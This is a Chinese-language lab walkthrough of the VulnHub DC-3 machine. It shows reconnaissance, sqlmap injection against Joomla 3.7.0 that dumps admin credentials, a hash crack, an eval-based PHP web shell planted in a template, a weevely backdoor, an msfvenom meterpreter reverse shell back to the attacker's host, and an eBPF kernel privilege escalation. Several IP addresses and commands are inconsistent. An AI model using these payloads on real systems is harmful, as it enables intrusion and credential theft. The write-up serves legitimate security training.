Vulnhub 靶机实战系列:DC -3网站管理员账号密码和系统提权
Vulnhub 靶机实战系列:DC -3网站管理员账号密码和系统提权搭建测试靶机下载地址:DC: 3.2 ~ VulnHub则靶机DC-3 ip:192.168.1.106(NAT连接)攻击机kali linux ip:192.168.1.237信息收集使用:nmap -sP 192.168.0.0/24 进行扫描找到目标靶机对目标靶机进行端口扫描利用nmap对目标主机进行端口扫描,发现开放端口:
因为中途靶机电脑关了所以靶机ip变了
Vulnhub 靶机实战系列:DC -3网站管理员账号密码和系统提权
搭建测试靶机
下载地址:DC: 3.2 ~ VulnHub
则靶机DC-3 ip:192.168.1.106(NAT连接)
攻击机kali linux ip:192.168.1.237
信息收集
使用:nmap -sP 192.168.0.0/24 进行扫描找到目标靶机
对目标靶机进行端口扫描
利用nmap对目标主机进行端口扫描,发现开放端口:80
使用命令:nmap -A -p- -T4 192.168.1.106
我们发现nmap扫描出此站点是由joomla搭建而成的
目录扫描
dirb http://192.168.1.106
访问:http://192.168.1.106/administrator/发现是一个后台登陆页面
知道网站用的是joomla cms,那我们就可以使用joomscan扫描工具扫描Joomla相关配置内容、已知漏洞等:
命令:joomscan --url http://192.168.1.106
发现 joomla 的版本为 3.7.0
这里若不适用nmap扫描也可以直接搜索joomla 3.7.0出现的漏洞:
searchsploit joomla 3.7.0
cat /usr/share/exploitdb/exploits/php/webapps/42033.txt
漏洞利用
使用sqlmap
爆表库
sqlmap -u "http://192.168.1.106/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
爆表
sqlmap -u "http://192.168.6.138/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --dbms mysql -D joomladb --tables
找到了名为# __users表,其中保存了用户名和密码信息;
爆列
sqlmap -u "http://192.168.1.106/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --columns -T '#__users' -D joomladb --batch
爆字段
sqlmap -u "http://192.168.1.106/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --dump 'username,password' -T '#__users' -D joomladb
用户名:admin
密码:$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu
利用johnny暴力破解,得到了明文密码为snoopy
进行提权
进入网站后台管理主页面(http://192.168.6.138/administrator/index.php),具体操作如下:
点击页面右侧的“ Templates ” ——> 再点击“ Templates ” ——> 点击“ Beez3 Details and Files ” ——> 点击“ index.php ”,进入网页源码。
其中登录后台管理的用户名和密码如下:
用户名:admin
密码:snoopy
登录之后找到这个页面
—》
在index.php中添加一句话木马并 save保存
<?php @eval($_POST['qwe']);?>
这样我们就可以用蚁剑进行连接
获得了一个非登录非交互式shell,权限为www-data
所以我们需要提升其为交互式shell
思路为:生成一个反弹木马——插入网站文件中(上述index.php中)——拿shell
生成一个后门木马:
weevely generate 123 shell.php
cat shell.php 查看生成的木马,并复制到index.php当中并保存
没有发现具有suid权限目录
但find发现sudo具有suid权限,遗憾的是无法使用:
ls -al //看有没有suid权限,若具有suid权限,文件权限应为 drwsr,此处没有
find / -perm -4000 //查看具有suid权限的文件
看看有没有内核漏洞吧,查看系统信息:
uname -a
lsb_release -a
搜索Ubuntu 16.04具有的漏洞(kali下):
searchsploit Ubuntu 16.04
cat ./usr/share/exploitdb/exploits/linux/local/39772.txt
可以看出下载这个
将下载好的包用蚁剑上传exploit.tar这个包到/tmp目录下
并解压 tar -xvf exploit.tar
cd ebpf_mapfd_doubleput_exploit/
./compile.sh
./doubleput
如果提权就直接拿下!不行就换一中shell环境
其他shell环境
使用msf建立反弹shell
执行:
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.237 LPORT=4444 > msfshell.php
这里的ip为kali ip
生成php的反弹shell:这里我ip写错了打开文件改了一下
将shell上传到DC-3主机中,然后使用msfconsole连接。
依次执行:
use exploit/multi/handler
set PAYLOAD /php/meterpreter/reverse_tcp
set LHOST 192.168.1.37
set PORT 4444
run
然后浏览器访问http://192.168.1.31/templates/beez3/msfshell.php
shell
python -c 'import pty; pty.spawn("/bin/bash")'
到之前解压的文件路径下按之前的运行:
./doubleput
就提权了
更多推荐
所有评论(0)